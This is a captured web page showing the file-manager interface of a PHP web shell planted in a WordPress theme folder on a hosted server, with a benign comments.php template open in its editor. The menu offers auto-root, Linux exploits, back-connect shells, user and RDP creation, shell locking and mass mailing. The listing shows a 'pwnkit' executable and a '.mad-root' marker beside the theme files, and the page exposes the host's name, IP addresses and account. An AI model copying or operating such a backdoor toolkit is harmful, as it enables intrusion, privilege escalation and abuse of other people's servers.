Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
mindscape /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
106
B
-rw-r--r--
LICENSE
34.33
KB
-rw-r--r--
comments.php
1.37
KB
-rw-r--r--
footer.php
122
B
-rw-r--r--
functions.php
11.88
KB
-rw-r--r--
header.php
452
B
-rw-r--r--
index.php
81
B
-rw-r--r--
page.php
99
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
9.03
KB
-rw-r--r--
screenshot.jpg
102.38
KB
-rw-r--r--
single.php
98
B
-rw-r--r--
style.css
438.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php if ( post_password_required() ) : return; endif; global $kubio_comments_data; ?> <div id="comments" class="post-comments"> <h4 class="comments-title"> <span class="comments-number"> <?php comments_number( __( 'No Responses', 'mindscape' ), __( 'One Response', 'mindscape' ), __( '% Responses', 'mindscape' ) ); ?> </span> </h4> <ol class="comment-list"> <?php wp_list_comments( array( 'avatar_size' => '40', 'format' => 'html5', ) ); ?> </ol> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <div class="h-row"> <div class="h-col h-col-auto"> <div class="prev-posts"> <?php previous_comments_link( sprintf( '« %s', __( 'Older Comments', 'mindscape' ) ) ); ?> </div> </div> <div class="h-col"></div> <div class="h-col h-col-auto"> <div class="next-posts"> <?php next_comments_link( sprintf( '%s »', __( 'Newer Comments', 'mindscape' ) ) ); ?> </div> </div> </div> <?php endif; ?> <?php if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <p class="no-comments"><?php _e( 'Comments are closed.', 'mindscape' ); ?></p> <?php endif; ?> </div>
Close